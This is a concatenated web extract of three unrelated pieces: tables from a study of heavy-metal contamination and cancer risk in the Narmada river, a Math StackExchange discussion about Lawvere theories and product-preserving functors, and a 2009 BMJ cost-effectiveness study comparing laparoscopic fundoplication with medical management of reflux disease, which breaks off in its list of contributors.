1.81 Moderately 0.28 Slightly 6.18 Unacceptable R13 69 Medium 2.66 Severely 0.30 Slightly 4.62 Unacceptable R14 71 Good 2.55 Severely 0.25 Slightly 4.40 Unacceptable R15 76 Good 1.88 Moderately 0.27 Slightly 4.05 Unacceptable R16 64 Medium 1.71 Moderately 0.27 Slightly 3.26 Unacceptable R17 69 Medium 1.86 Moderately 0.25 Slightly 3.20 Unacceptable R18 74 Good 1.41 Moderately 0.13 Slightly 2.27 Unacceptable R19 77 Good 0.76 Slightly 0.20 Slightly 2.24 Unacceptable R20 80 Good 0.68 Slightly 0.18 Slightly 2.14 Unacceptable R21 73 Good 1.50 Moderately 0.30 Slightly 2.65 Unacceptable R22 72 Good 0.89 Slightly 0.21 Slightly 2.56 Unacceptable R23 64 Medium 1.22 Moderately 2.02 Moderately 10.82 Unacceptable ##### Table 2 Evaluation of Cancer Risk Value at Sampling Location in River Narmada Sampling location Cancer risk value (1×10−6) Cancer risk status Cr As Pb Average R1 317.44 2333.14 1943.07 1531.22 High R2 400.29 2090.83 2307.01 1599.37 High R3 790.48 3938.45 2144.09 2291.01 High R4 335.26 2365.21 1544.88 1415.12 High R5 594.49 2058.76 300.69 984.65 High R6 302.59 2238.71 464.99 1002.09 High R7 103.64 2195.95 380.15 893.24 High R8 603.40 1995.51 306.74 968.55 High R9 163.03 2423.11 191.07 925.74 High R10 333.48 1752.30 383.29 823.02 High R11 408.01 2432.02 206.62 1015.55 High R12 21736.75 15821.50 11.91 12523.39 High R13 21787.23 10512.04 8.48 10769.25 High R14 21427.92 10182.42 4.24 10538.19 High R15 20195.58 9175.76 5.20 9792.18 High R16 15064.28 7714.76 3.89 7594.31 High R17 13831.94 7509.87 2.68 7114.83 High R18 10488.28 4908.59 3.53 5133.47 High R19 11108.91 4890.77 3.38 5334.35 High R20 9710.27 4970.95 4.04 4895.08 High R21 9365.81 6877.37 2.47 5415.22 High R22 9529.13 6619.02 3.94 5384.03 High R23 10360.59 8195.82 0.81 6185.74 High ##### Table 3 Pearson Correlation Coefficients of Heavy Metals Heavy metals Cr Mn Fe Cu Zn As Cd Pb Co Ni Cr 1.000 Mn 0.064 1.000 Fe 0.873 0.400 1.000 Cu −0.584 −0.134 −0.590 1.000 Zn −0.538 −0.128 −0.544 0.986 1.000 As 0.932 0.163 0.850 −0.492 −0.449 1.000 Cd 0.225 −0.122 0.047 0.314 0.335 0.462 1.000 Pb −0.554 −0.124 −0.555 0.998 0.981 −0.463 0.323 1.000 Co −0.710 −0.157 −0.736 0.870 0.842 −0.591 0.345 0.853 1.000 Ni 0.914 0.198 0.955 −0.642 −0.593 0.868 0.071 −0.608 −0.781 1.000 ##### Table 4 PCA Components Values and Communalities of Heavy Metals Elements Component Communalities 1 2 3 Initial Eigen values 6.150 2.028 1.071 Variance % 61.498 20.281 10.712 Cumulative % 61.498 81.779 92.490 Co −0.920 0.237 0.029 0.903 Ni 0.908 0.303 0.040 0.918 Cu −0.887 0.393 0.124 0.956 Fe 0.879 0.317 0.257 0.940 Pb −0.865 0.418 0.134 0.941 Cr 0.862 0.421 −0.122 0.936 Zn −0.854 0.432 0.127 0.932 As 0.795 0.587 −0.049 0.978 Cd −0.101 0.862 −0.216 0.800 Mn 0.235 0.007 0.943 0.944 ##### Table 5 Comparative Analysis of Average Heavy Metal Concentration Dissolved in the Indian Rivers S. No Rivers name Location Mn (μg/L) Cu (μg/L) Co (μg/L) Fe (μg/L) Ni (μg/L) Zn (μg/L) Pb (μg/L) Cr (μg/L) Cd (μg/L) As (μg/L) Reference 1 Ganga Western Uttar Pradesh NR 1910 NR 2810 NR 2500 NR 550 NR NR [28] 2 Sabarmati Gujarat NR 386 NR NR 289 103 NR 309 NR NR [38] 3 Subarnarekha West Bengal 7.04 4.84 0.27 83.60 3.03 NR NR 0.80 NR NR [39] 4 Mahanadi State of Orissa 17.51 9.86 5.81 113.50 13.12 23.21 7.31 5.13 1.23 NR [40] 5 Achankovil Kerala 699 224 NR 11858 NR 415 72 NR 6 NR [41] 6 Damodar West Bengal NR 3950 NR 480 NR NR NR 11550 300 NR [42] 7 Gomti Uttar Pradesh 97 1.30 NR 220 9 28.5 26 4 0.40 NR [43] 8 Koel-Brahmani West Bengal 303.30 6.67 8.67 481 24.78 31.56 1.67 10.89 NR NR [44] 9 Hindon Western Uttar Pradesh 129 6.6 NR 226 24 58 37 15 NR NR [45] 10 Brahmani river State of Orissa 102 4.70 5.6 95 52 80.10 27 NA 4 NR [46] 11 Baitarani State of Orissa 1.70 3.45 0.70 100.5 3.90 272.30 3.45 9.60 NR NR [47] 12 Kali (East) Western Uttar Pradesh NR NR NR 1530 NR 24710 130 60 60 NR [48] 13 Narmada Madhya Pradesh 13.68 80.80 0.05 55.95 1.68 22.77 8.81 2.62 0.06 0.6 In this study TOOLS Full text via DOI Supplement Print Share: METRICS 31 Crossref 33 Scopus 6,434 View
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 9, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5629773736000061, "perplexity": 9432.914484454774}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711017.45/warc/CC-MAIN-20221205132617-20221205162617-00016.warc.gz"}
http://math.stackexchange.com/questions/585868/lawvere-theories-an-equivalence
# Lawvere theories: an equivalence. I'm having trouble understanding Lawvere theories (as defined below). Definition: A Lawvere Theory is a category $\mathcal{L}$ with finite products and with a distinguished object $A$ such that every object of $\mathcal{L}$ is (isomorphic to) a finite power of $A$; that is, for any $X\in\operatorname{Ob}(\mathcal{L})$, there is an $n\in\mathbb{N}$ with $X\cong A^{n}$. The object $A$ is called the fundamental object of $\mathcal{L}$. An arrow $\omega :A^{n}\to A$ is called an $n$-ary operation (and, in particular, arrows of the type $A^{0}=1\to A$ are called constants). Here's an exercise in Turi's Category Theory Lecture Notes: Let $\mathbb{N}^{\text{op}}$ be the opposite category of natural numbers and all functions. Show that Lawvere theories are equivalent to product preserving functors $$\mathbb{N}^{\text{op}}\to\mathbf{C}$$ that are bijective on objects. The problem: I'm not sure what to do. The $\mathbf{C}$ doesn't help as it's undefined. My attempt: Let $\mathcal{L}:\mathbb{N}^{\text{op}}\to\mathbf{C}$ be a product preserving functor bijective on objects. Then for any $(n_{i})_{I}\in\mathbb{N}$ for any set $I$, if $\prod_{i\in I}{n_{i}}$ exits, then $\mathcal{L}\left(\prod_{i\in I}{n_{i}}\right) = \prod_{i\in I}{\mathcal{L}(n_{i})}$ and for all $m, n\in\mathbb{N}$, $c\in Ob(\mathbf{C})$, • $\mathcal{L}(n)=\mathcal{L}(m)\Rightarrow n=m$ • there exists $m_{c}\in\mathbb{N}$ with $\mathcal{L}(m_{c})=c$. I then set up the commutative diagram(s) for the product with an arbitrary $(f_{i})_{I}$ such that $f_{i}: k\to n_{i}$ in $\mathbb{N}^{\text{op}}$ and took $\mathcal{L}$ of everything. Then I got stuck. I want to force this $\mathcal{L}$ to be a Lawvere theory. Once I've done that, I'll take a Lawvere theory and try to go in the other direction. Thank you :) Second attempt (based on the comments): The trick is to consider what happens to $1\in Ob(\mathbb{N}^{\text{op}})=\mathbb{N}$. Note that the product in $\mathbb{N}^{\text{op}}$ is the coproduct in $\mathbb{N}$, so is simply addition. Suppose $L:\mathbb{N}^{\text{op}}\to\mathbb{C}$ is a product preserving functor bijective on objects. Then for all $c\in Ob(\mathbf{C})$, there exists a unique $m_{c}\in Ob(\mathbb{N}^{\text{op}})=\mathbb{N}$ with $L(m_{c})=c$ and for any $m, n\in\mathbb{N}, L(m)=L(n)\Rightarrow m=n$. Let $L(1)=A$ and note that if a product $\sum_{i\in I}{a_{i}}$ exists in $\mathbb{N}^{\text{op}}$ for $a_{i}\in Ob(\mathbb{N}^{\text{op}})=\mathbb{N}$, it is in $\mathbb{N}$ and so $I$ would be a finite set. Hence finite products must exist in $\mathbf{C}$. Now for $X\in\mathbf{C}$, $X=L(m_{X})$ for some $m_{X}\in\mathbb{N}$ so $X=L(m_{X})=L(\sum_{j=1}^{m_{X}}{1})=\prod_{j=1}^{m_{X}}{L(1)}=A^{m_{X}}$. Thus $X\cong A^{m_{X}}$. Therefore, the pair $\langle L, \mathbf{C}\rangle$ is a Lawvere theory. Ideas for the converse: Let $L:\mathbb{N}^{\text{op}}\to\mathcal{L}$ such that $L(1)=A$ and . . . • $L(u)=U\cong V=L(v)$ iff $L(u)=L(v),$ • $Y\cong A^{m}=L(m_{A^{m}})$ implies $L(m_{A^{m}})=Y$, or • $L(m)=Y$ if (and only if) $Y\cong A^{m}$. I've explored these ideas and they don't seem fruitful. I would like an explicit proof now please, $\color{red}{\large\text{not just hints}}$. This is really bugging me. - The category $\mathcal{C}$ is a Lawvere theory, if you have a bijective-on-objects product-preserving functor $\mathbb{N}^\mathrm{op} \to \mathcal{C}$. –  Zhen Lin Nov 29 '13 at 17:29 @Zhen Lin: Thank you. Given the definition above, though, I'm afraid that's little more than an assertion to me at the moment; I want to be able to show it :/ –  Alice Nov 29 '13 at 17:34 It says nothing of the sort. It says "equivalent". More precisely there is an equivalence between the category of Lawvere theories and the category of bijective-on-objects product-preserving functors with domain $\mathbb{N}^\mathrm{op}$, if you choose the appropriate notion of morphism on both sides. –  Zhen Lin Nov 29 '13 at 17:52 Yes, you can do that. –  Zhen Lin Nov 29 '13 at 17:57 The product in $\mathbb{N}^\mathrm{op}$ is the coproduct in $\mathbb{N}$, which is addition. –  Zhen Lin Dec 1 '13 at 22:41 Let $\mathbf C$ be a Lawvere theory: i.e. a category with finite products such that there's an object $A \in \mathbf C$ for which for every other $X \in \mathbf C$ there's a $n \in \mathbb N$ such that $A^n\cong X$. Let's consider $\mathbb N$ the category of natural numbers and all function between them. Clearly we have a function between the objects of $\mathbb N$ and the objects of $\mathbf C$ defined as $$\mathcal L\colon \mathbb N \to \mathbf C,$$ with $\mathcal L(n) = A^n$ for $n \in \mathbb N \setminus\{0\}$ and $\mathcal L(0)=\bullet$ the terminal object of $\mathbf C$. Let $f \colon n \to m$ be a morphism in $\mathbb N$, or else a function between the sets $\{0,\dots,n-1\}$ and $\{0,\dots,m-1\}$. For every $i \in \{0,\dots,m-1\}$ we can consider the family of morphism $\langle \pi_i^j\rangle_{j=1,\dots,n}$ where $\pi^i_j=1_A$ if $i \in f^{-1}(\{j\})$ other wise $\pi^i_j \colon A \to \bullet$ is the unique map in the terminal object $\bullet \in \mathbf C$. These morphisms give us a morphism $$\pi^i \colon A \to A^{f^{-1}(\{i\})}$$ for universal property of products and then we get the product morphism $$\mathcal L(f) = \prod_{i=1}^n \pi^i \colon A^n=\mathcal L(n) \to A^m=\mathcal L(m).$$ Clearly if $f=1_n$ for a $n$ then for every $i \in n$ we have $1_n^{-1}(\{i\})=\{i\}$ and so the $\pi^i=1_A$ for every $i$ and so $\mathcal L(1_n)=1_{A^n}$. Doing the calculations you can prove also that $\mathcal L(g \circ f)=\mathcal L(f) \circ \mathcal L(g)$, for every pair $f \colon n \to m$ and $g \colon m \to k$, of course the calculation are a little complicated (I would rather not to write here). This functor is clearly product preserving, indeed for every $n \in \mathbb N$ we have that $\mathcal L(n)=A^n$ which is the n-fold product, and every projection of $\mathbb N^\text{op}$ i.e. a map $p \colon 1 \to n$ in $\mathbb N$ we have that $$\mathcal L(p) = \prod_{i=1}^n \pi^i \colon A^n \to A,$$ where every $\pi^i \colon A \to \bullet$ for $i \not \in \text{Im }p(0)$ and $\pi^i = 1_A$ for $i \in \text{Im }p(0)$. So $\mathcal L(p)$ is the $p(0)$-th projection of the product $A^n$, of course now one should verify that these data verify the universal property which involve again some long calculations. Forgive the lack of some details, but I think that adding them wouldn't make the answer more clear. Hope this helps. - Thank you so much for your patience in writing that out for me, @Giorgio Mossa! I'm confident that I can take it from here. [I first need to check the existence of $\bullet$.] I hope you understand if I accept once I've got the damn thing! –  Alice Dec 4 '13 at 11:58 @Shaun sure of course. Btw $\bullet$ the terminal object is also the empty product so it must exists in every category with finite products. :) –  Giorgio Mossa Dec 4 '13 at 12:08 Again, thank you. I'm not sure I understand how $\mathcal{L}$ is bijective on objects though. What if there exists an $X$ such that $A^{n}\neq X\cong A^{n}$? [The same question, I suppose, covers how we can overlook $A^{n}\times\bullet\cong A^{n}$.] –  Alice Dec 4 '13 at 19:23 Oh, I see; it's a bit of a misnomer. –  Alice Dec 4 '13 at 19:30 [I'm following Turi's lecture notes. Maybe the term was covered in additional exercises or some other supplement.] –  Alice Dec 4 '13 at 19:44
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9796623587608337, "perplexity": 171.05873444257853}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-35/segments/1440644063881.16/warc/CC-MAIN-20150827025423-00244-ip-10-171-96-226.ec2.internal.warc.gz"}
https://www.bmj.com/content/339/bmj.b2576
Intended for healthcare professionals Research # Laparoscopic fundoplication compared with medical management for gastro-oesophageal reflux disease: cost effectiveness study BMJ 2009; 339 (Published 14 July 2009) Cite this as: BMJ 2009;339:b2576 1. David Epstein, honorary visiting fellow, doctoral student12, 2. Laura Bojke, research fellow1, 3. Mark J Sculpher, professor of health economics1, 4. The REFLUX trial group 1. 1Centre for Health Economics, University of York, Heslington, York YO1 5DD 2. 2Faculty of Economics and Business Sciences, Campus Universitario de la Cartuja, 18071 Granada, Spain 1. Correspondence to: L Bojke [email protected] • Accepted 19 March 2009 ## Abstract Objective To describe the long term costs, health benefits, and cost effectiveness of laparoscopic surgery compared with those of continued medical management for patients with gastro-oesophageal reflux disease (GORD). Design We estimated resource use and costs for the first year on the basis of data from the REFLUX trial. A Markov model was used to extrapolate cost and health benefit over a lifetime using data collected in the REFLUX trial and other sources. Participants The model compared laparoscopic surgery and continued proton pump inhibitors in male patients aged 45 and stable on GORD medication. Intervention Laparoscopic surgery versus continued medical management. Main outcome measures We estimated quality adjusted life years and GORD related costs to the health service over a lifetime. Sensitivity analyses considered other plausible scenarios, in particular size and duration of treatment effect and the GORD symptoms of patients in whom surgery is unsuccessful. Main results The base case model indicated that surgery is likely to be considered cost effective on average with an incremental cost effectiveness ratio of £2648 (€3110; US$4385) per quality adjusted life year and that the probability that surgery is cost effective is 0.94 at a threshold incremental cost effectiveness ratio of £20 000. The results were sensitive to some assumptions within the extrapolation modelling. Conclusion Surgery seems to be more cost effective on average than medical management in many of the scenarios examined in this study. Surgery might not be cost effective if the treatment effect does not persist over the long term, if patients who return to medical management have poor health related quality of life, or if proton pump inhibitors were cheaper. Further follow-up of patients from the REFLUX trial may be valuable. Trial registration ISRCTN15517081. ## Introduction Around 25% of adults in Western society experience intermittent heartburn, one of the cardinal symptoms of gastro-oesophageal reflux disease (GORD).1 2 Once diagnosed with erosive (persistent) GORD, patients often require lifelong pharmacotherapy, usually proton pump inhibitors.3 Although considered effective, there are concerns about the long term side effects of proton pump inhibitors, and expenditure on these drugs remains considerable, despite recent reductions in prices. In general practice in England expenditure was £233m (€274m; US$386m) in 2007.4 Laparoscopic fundoplication is now an alternative way to treat GORD. In addition to potential clinical benefits laparoscopic surgery should lead to the avoidance of continual medication and its associated costs. Several studies have examined economic characteristics of laparoscopic surgery.5 6 7 8 Of those that compared surgery with GORD medication, Bojke8 found that surgery was cost effective, and Cookson6 concluded that laparoscopic surgery had similar costs to medical management after eight years and was cost saving thereafter. Arguedas evaluated the strategies in a United States setting and concluded that medical therapy dominated surgery using a 10 year time horizon, assuming a higher rate of symptom recurrence and re-operation after surgery than in the surgery groups in the UK based studies.5 None of these studies, however, used estimates of health related quality of life derived from a randomised clinical trial comparing laparoscopic fundoplication with medical management, which is of central importance to the evaluation of these treatments. This paper updates the economic study by Bojke8 to incorporate one year health related quality of life data from the REFLUX trial.9 The multicentre REFLUX trial compared a strategy of laparoscopic surgery with one of continued medical management for patients with reasonable symptom control on GORD medications.9 The clinical and patient assessed outcomes of the trial up to one year after surgery have recently been reported. Although these findings showed clear benefits of surgery at this time in terms of health related quality of life, decision makers are also interested in the costs and cost effectiveness of the two forms of management. GORD is usually a chronic condition and a key issue is the extent to which benefits are sustained. Surgery is costly in the short term, but these costs may be at least partly offset by reductions in lifetime use of GORD medication. Extrapolation of health benefits and costs are thus needed to provide a meaningful estimate of cost effectiveness. ## Methods ### Overview We used a model comparing laparoscopic surgery and continued use of proton pump inhibitors in male patients aged 45 (the median age and predominant sex in the REFLUX trial9), and stable on anti-GORD medication. Over a lifetime horizon, health benefits were quantified in terms of quality adjusted life years and costs were assessed from the perspective of the United Kingdom’s NHS in 2008/2009 prices. Future costs and health benefits are discounted (adjusted to current values) at 3.5% per year, in accord with UK guidelines for economic evaluation.10 ### Model structure Figure 1 shows the model structure. It is a discrete time Markov cohort model with a cycle length of one year. Patients follow a strategy of either early laparoscopic surgery or continuation of medical management (without the option of surgery after failure of medical management). Fig 1 Model structure In the model, surgery may “fail” in one of two ways. Patients may need revision of surgery, either to improve symptom control or because of surgical complications, or they may return to use of long term medical management because of continued symptoms.11 This model assumes that patients in the medical management arm are stable on GORD medication. This assumption follows the inclusion criteria for the REFLUX trial. As a result “treatment failure” is not defined as a health state in the model. Annual costs of medical management are estimated using mean consumption of proton pump inhibitors during the REFLUX trial, incorporating any changes to dose or medication, and it is assumed that the estimate of health related quality of life includes, on average, remission or any side effects of medication. The base case assumes that, if surgical patients do not need to return to medical management or need revision of surgery, the relative difference in health related quality of life of surgery over medical management will be maintained over their lifetime. We used sensitivity analyses to consider other scenarios where the treatment effect (the difference in health related quality of life between medical management and those who do not fail surgery) only lasts for one, two, or five years. In these alternative scenarios, health related quality of life is the same in the surgery group as in the medical management group after the “treatment effect” ends, even in patients who do not return to the use of proton pump inhibitors. ### Evidence used in the model Costs for the first year in the model were estimated from the REFLUX trial.9 The trial collected data on use of health service resources up to one year, including inpatient days in hospital wards and high dependency units, diagnostic tests, duration in theatre, outpatient and general practitioner visits, re-admissions, and use of GORD medication. These resources were costed using routine NHS unit costs and prices (table 1). Table 1 Health related quality of life (HRQOL) estimates and rates of events used in model View this table: We calculated rates of return to medical management and revision of surgery using data from the REFLUX trial and studies identified through a literature search.8 12 The average rate of return to medical management overall was 4.9 per 100 person years and the average rate of revision of surgery was 0.8 per 100 person years, although rates seemed to vary considerably between studies. As we did not find evidence that this variation was related to length of follow-up, we assumed that the annual rate of surgical failure was constant over time. Details of the literature searches and meta-analyses are available in the Health Technology Assessment monograph.12 Sensitivity analyses were undertaken assuming higher and lower rates of failure. After the first year, all patients require an annual visit to their general practitioner. It was assumed that patients who fail surgery need an additional visit to their general practitioner and to a hospital specialist. No hospital admissions or outpatient visits for GORD related reasons were included after one year for patients with successful surgery.13 Patients can die of other causes,14 and the model assumed the same age and sex specific risk of mortality as the UK general population. Although no deaths from surgery or revision occurred in the REFLUX trial, a small additional risk of operative mortality was assumed, estimated by a meta-analysis (four deaths in 4000 procedures).8 ### Estimating quality adjusted life years The REFLUX trial measured health status using the generic EuroQol EQ-5D instrument.15 Each of the possible 243 health states was mapped to a preference based value (or “utility”) where zero represents a state equivalent to death and one represents full health.16 Table 1 shows the mean differences in utility between treatments at one year estimated by the REFLUX trial.12 No other randomised trials have compared surgery with medication using a preference based measure of health related quality of life. We assumed that the “adjusted treatment received” analysis of the REFLUX trial12 was the most appropriate measure of the effect of surgery on health related quality of life to use in the base case model. This approach identifies the efficacy of surgery in patients who are most likely to comply with their clinicians’ recommendations for treatment.17 18 We also used intention to treat and per protocol estimates in sensitivity analyses. In the model, we use the term “treatment effect” to refer to the difference in health related quality of life between medical management and those who do not fail surgery. This value differs from the estimates calculated in the trial, which measured the mean difference in health related quality of life between medical management and surgery, whether failed or not. As those who fail surgery would be expected to have lower health related quality of life than those who do not, this approach estimates a lower bound for the benefits of surgery by the model. We estimated the health related quality of life of the 15 patients in the surgery group of the REFLUX trial who required proton pump inhibitors at one year to be 0.68 (standard error 0.048) using the EQ5D, a decrease of 0.04 from baseline. In view of the small sample of patients and short follow-up, it was assumed in the base case analysis that patients who needed proton pump inhibitors after surgery returned to their baseline (pre-surgery) health related quality of life, consistent with clinical opinion (Robert Heading, personal communication, 2008) that proton pump inhibitors are just as effective after surgery as before, provided they are being used to treat reflux symptoms. This assumption was varied in sensitivity analysis. To account for the decline in health related quality of life with age, the mean utility for medical management observed at the end of the REFLUX trial was compared with the average utility for the general population aged 45-5519 to calculate a proportionate decrement in utility for that health state. It was assumed that this proportionate decrement was constant as the cohort aged (table 1). ### Analysis We did calculations using Excel. The model estimated mean costs and quality adjusted life years in each treatment cohort. Where one treatment did not dominate the other, the incremental cost effectiveness ratio was calculated as the ratio of the difference in expected costs to the difference in expected quality adjusted life years. A probabilistic sensitivity analysis was done by assigning probability distributions to the model inputs, rather than treating them as point estimates.20 This analysis calculated the overall uncertainty in the treatment decision as the proportion of simulations where laparoscopic surgery is cost effective, given threshold values for the incremental cost-effectiveness ratio of £20 000 and £30 000 per quality adjusted life year as used by the National Institute of Health and Clinical Excellence.10 ## Results Table 2 shows the use of health service resources and cost for GORD related causes during the first year of follow-up in the REFLUX trial,12 for patients receiving their randomised treatment per protocol. Total costs were £370 per patient in the medical management arm and £2709 in the surgical arm, a difference of £2339 (95% confidence interval 2147 to 2558; calculated with bias corrected accelerated bootstrap).21 Table 2 Mean use of healthcare resources and costs for GORD related causes in REFLUX trial12 for patients receiving their randomised treatment per protocol and followed up for one year View this table: Under base case assumptions, the model predicts that, for example, by five years 17.7% of surgery patients will have returned to medical management, 2.9% will have undergone a re-operation, and 0.1% will have died during surgery. The average discounted lifetime cost per patient of surgery was £5026, made up of the initial cost of the cost of surgery (£2132), repair of surgery (£746), return to medical management (£1360) and other health care (£788). The discounted lifetime cost of the medical management group was £3411. Therefore, surgery had an additional mean cost of £1616. The mean difference in quality adjusted life years was 0.61, equating to an incremental cost effectiveness ratio of £2648 per quality adjusted life year (table 3, scenario 1). In the base case, the probability that surgery is cost effective at a cost effectiveness threshold of £20 000 is 0.94. Table 3 Results of base case economic model and sensitivity analyses. Expected costs and QALYs per patient in each scenario were calculated as mean of 1000 simulations using probabilistic model View this table: We explored several scenarios regarding the size and duration of treatment effect, GORD symptoms of those who fail surgery and costs (table 3). Use of intention –to treat and per protocol estimates of effect did not change the conclusion that surgery is cost effective assuming a threshold of £20 000 per quality adjusted life year gained. The probability that surgery is cost effective decreases to 0.77 if patients who return to proton pump inhibitors have worse GORD symptoms than before surgery (scenario 7). Surgery is unlikely to be cost effective if it is assumed that its benefits (in terms of health related quality of life relative to medical management) are not maintained beyond one year (scenario 4). Surgery might also not be cost effective in some multivariate sensitivity analyses. For example, the incremental cost effectiveness ratio increases to about £22 000 if proton pump inhibitors can be effectively delivered at half the cost estimated here—perhaps due to greater use of lower cost drugs—and there is no difference in health related quality of life after two years (scenario 16). ## Discussion ### Principal findings Under base case assumptions, surgery is cost effective on average with an incremental cost-effectiveness ratio of £2648 per quality adjusted life year. The probability of surgery being cost effective is high given a threshold of £20 000 per quality adjusted life year and assuming the treatment effect lasts for at least five years and patients who fail surgery do not have worse symptoms than before surgery. The results of this analysis are similar to those of Bojke8 who also found surgery to be cost effective. That model was constructed using baseline utility data from the REFLUX trial but did not include the treatment effect of surgery at one year. ### Strengths and weaknesses of this study We have compared the cost effectiveness of laparoscopic surgery with that of medical management using randomised data on the effect of treatment on health related quality of life. The REFLUX trial was a pragmatic study and the results, in terms of symptom control and health related quality of life, are expected to be generalisable to patients in the UK who are stable on GORD medication and suitable for surgery.22 Nevertheless, because rates of surgical reintervention and return to medical management in clinical practice might differ from the trial or with longer follow-up,23 we have used mean rates from a literature review to inform this analysis. In the base case we used the “adjusted treatment” received estimate of the treatment efficacy. Intention to treat and per protocol estimates were also used in sensitivity analyses. The intention to treat analysis is an unbiased estimate of effectiveness but is diluted by the high proportion (38%) of patients in the REFLUX trial who were randomised to surgery but did not receive it.12 The most common reason given for non-compliance was patient choice, which was thought to be affected by long waiting times.12 Given that waiting times vary between centres and over time, the intention to treat estimate in the REFLUX trial might not be generalisable to current practice in the NHS. The per protocol analysis adjusting for baseline age, sex, body mass index, and EQ-5D score is another measure of the efficacy of surgery12 but using regression to adjust for observed baseline characteristics may not adequately control for selection bias. Regardless of whether an adjusted treatment received, intention to treat or per protocol analysis is conducted, surgery appears to be cost effective at the thresholds used by NICE (National Institute for Health and Clinical Excellence), if it is assumed that health related quality of life is maintained over the long term. Costs of medication were calculated using current pack prices24 applied to the prescribing pattern observed in REFLUX.12 Some evidence indicates that prescribers have been switching to lower cost proton pump inhibitors such as lansoprazole or omeprazole following sharp reductions in their prices in recent years, and consequently the current cost of medical management may be lower than estimated here.4 However, surgery remains cost effective even if the annual cost of medication is half that in the base case, other considerations being equal. Nevertheless, in some scenarios surgery is unlikely to be cost effective, particularly where costs of medical management are lower than calculated in the base case and the health related quality of life benefit of surgery is not maintained over the long term. The duration of the treatment effect is, therefore, an important but uncertain assumption. To inform this question, follow up of REFLUX trial patients has been extended to five years. Given the results of the trial so far and the assumptions made in the decision model, extending the follow up of the trial from one year (scenario 4) to five years (scenario 6) would increase the probability that surgery is cost effective at a threshold of £20 000 per quality adjusted life year from 0.20 to 0.88. However, under more pessimistic assumptions about health related quality of life of patients who return to medical management, then even five years of follow-up would still leave considerable uncertainty about the value of surgery. ### Conclusions Although surgery seems likely to be cost effective in terms of expected (mean) costs and health effects, uncertainty remains about the duration of the treatment effect and the severity of GORD symptoms after failure of surgery. Furthermore, a number of practical issues need to be considered before the NHS could offer surgery to all patients who are currently stable on medical management. In particular, surgical capacity and availability of trained surgeons are potential barriers to implementation that would need to be addressed. #### What is already known on this topic Laparoscopic surgery is an efficacious treatment of stable GORD that would otherwise require medical management Surgery is costly in the short term, but these costs may be at least partly offset by less lifetime use of anti-GORD medication This study compared the cost effectiveness of laparoscopic surgery and medical management using randomised data on the effect of treatment on health related quality of life The findings indicate that laparoscopic surgery is cost effective provided that clinical benefits are sustained in the medium to long term ## Notes Cite this as: BMJ 2009;339:b2576 ## Footnotes • Trial team: Aberdeen—Marion Campbell, Adrian Grant, Craig Ramsay, Samantha Wileman; York—Garry Barton (1999-2002), Laura Bojke, David Epstein, Sue Macran, Mark Sculpher. Trial steering group: Wendy Atkin (independent chair), John Bancewicz, Ara Darzi, Robert Heading, Janusz Jankowski, Zygmunt Krukowski, Richard Lilford, Iain Martin (1997-2000), Ashley Mowat, Ian Russell, Mark Thursz. Data monitoring committee: Jon Nicholl, Chris Hawkey, Iain MacIntyre. Wendy Atkin, Janusz Jankowski, Richard Lilford, Jon Nicholl, Chris Hawkey, and Iain MacIntyre were independent of the trial. Members of the reflux trial group responsible for recruitment in the clinical centres were as follows. Aberdeen Royal Infirmary: A Mowat, Z Krukowski, E El-Omar, P Phull, T Sinclair, L Swan. Belfast Victoria Hospital: B Clements, J Collins, A Kennedy, H Lawther, B Mulvenna. Royal Bournemouth Hospital: D Bennett, N Davies, M McCullen, S Toop, P Winwood. Bristol Royal Infirmary: D Alderson, P Barham, K Green, R Mountford, S Tranter, R Mittal. Princess Royal University Hospital, Bromley: M Asante, L Barr, S El Hasani. Royal Infirmary of Edinburgh: A De Beaux, R Heading, L Meekison, S Paterson-Brown, H Barkell. Royal Surrey County Hospital, Guildford: G Ferns, M Bailey, N Karanjia, TA Rockall, L Skelly, M Smith. Hull Royal Infirmary: M Dakkak, J King, C Royston, P Sedman. Raigmore Hospital, Inverness: K Gordon, I McGauran, LF Potts, C Smith, PL Zentler-Munro, A Munro. General Infirmary at Leeds: A Axon, B Chanley, S Dexter, M McMahon, P Maoyeddi. Leicester Royal Infirmary: DM Lloyd, A Palmer-Jeffrey, B Rathbone. St Mary’s Hospital, London: V Loh, M Thursz, A Darzi. Whipps Cross Hospital, London: A Ahmed, R Greaves, A Sawyerr, J Wellwood, T Taylor. Poole Hospital: S Hosking, T Karlowski, S Lowrey, N Sharer, J Snook. Queen Alexandra Hospital, Portsmouth: H D Duncan, P Goggin, T Johns, A Quine, S Somers, S Toh. Hope Hospital, Salford: SEA Attwood, C Babbs, J Bancewicz, M Greenhalgh, W Rees, A Robinson. North Staffordshire Hospital, Stoke-on-Trent: T Bowling, Dr Brind, CVN Cheruvu, M Deakin, S Evans, R Glass, J Green, F Leslie, JB Elder. Morriston Hospital, 